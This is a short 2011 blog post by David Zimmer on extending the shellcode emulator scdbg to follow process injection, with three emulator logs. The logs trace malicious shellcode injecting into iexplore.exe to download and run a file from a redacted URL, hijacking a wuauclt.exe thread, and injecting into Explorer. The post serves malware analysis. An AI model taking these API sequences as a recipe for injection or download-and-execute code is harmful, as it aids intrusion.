scdbg vrs Process Injection

Author: David Zimmer
Date: 03.31.11 - 4:30pm

Experimented with some ideas about making scdbg compatiable with process injection shellcode. Added support for the standard functions such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.

Even though we dont have any other process to work with, it turned out pretty slick and came up with a simple solution that allows the injection to "work" and then transfer execution right to the injected code to log what it does too.

Basically I just treat remote process allocations and writes in process memory, then transfer execution to the specified "remote" address when CreateRemoteThread is called.

Quite simple implementation, but has powerful results. Makes analyzing this type of shellcode sooo much easier.

401032  CreateProcessA( C:\Program Files\Internet Explorer\iexplore.exe,  ) = 0x1269
401046  VirtualAllocEx(pid=1269, base=0 , sz=1000) = 60000
4010c3  WriteProcessMemory(pid=1269, base=60000 , buf=40120c, sz=1000)
4010f7  CreateRemoteThread(pid=1269, addr=60000 , arg=0, flags=0, *id=0)
        Transferring execution to threadstart...
600ac   LoadLibraryA(urlmon)
600bc   URLDownloadToCacheFileA(http://removed, buf=12fcf8)
600d7   CreateProcessA( , c:\URLCacheTmpPath.exe ) = 0x1269
600ec   TerminateThread(fffffffe) = 1

or

401403  CreateProcessA( wuauclt.exe,  ) = 0x1269
40141a  VirtualAllocEx(pid=1269, base=0 , sz=1a12) = 60000
401434  WriteProcessMemory(pid=1269, base=60000 , buf=401164, sz=1a12, written=12fdc4)
401446  GlobalAlloc(sz=cc) = 62000
40145a  GetThreadContext(h=126a)
401468  SetThreadContext(h=126a, eip=60000)
40146f  ResumeThread(h=126a)
        Transferring Execution to threadstart 60000
6003d   CreateThread(60070, 0) = 1
        Transferring execution to threadstart...
600fc   ExpandEnvironmentStringsA(%ALLUSERSPROFILE%\Plug1.dll, dst=40403f10, sz=104)

or

401156  FindWindowA(class=Progman, window=Program Manager)
401166  GetWindowThreadProcessId(h=0, buf=12fdd0)
401176  OpenProcess(access=1f0fff, inherit=0, pid=14077ac0)
401190  VirtualAllocEx(pid=99999999, base=0 , sz=1000) = 60000
4011ad  WriteProcessMemory(pid=99999999, base=60000 , buf=4019dd, sz=310, written=0)
4011c3  CreateRemoteThread(pid=99999999, addr=60000 , arg=0, flags=0, *id=0)
        Transferring execution to threadstart...
60190   LoadLibraryA(kernel32)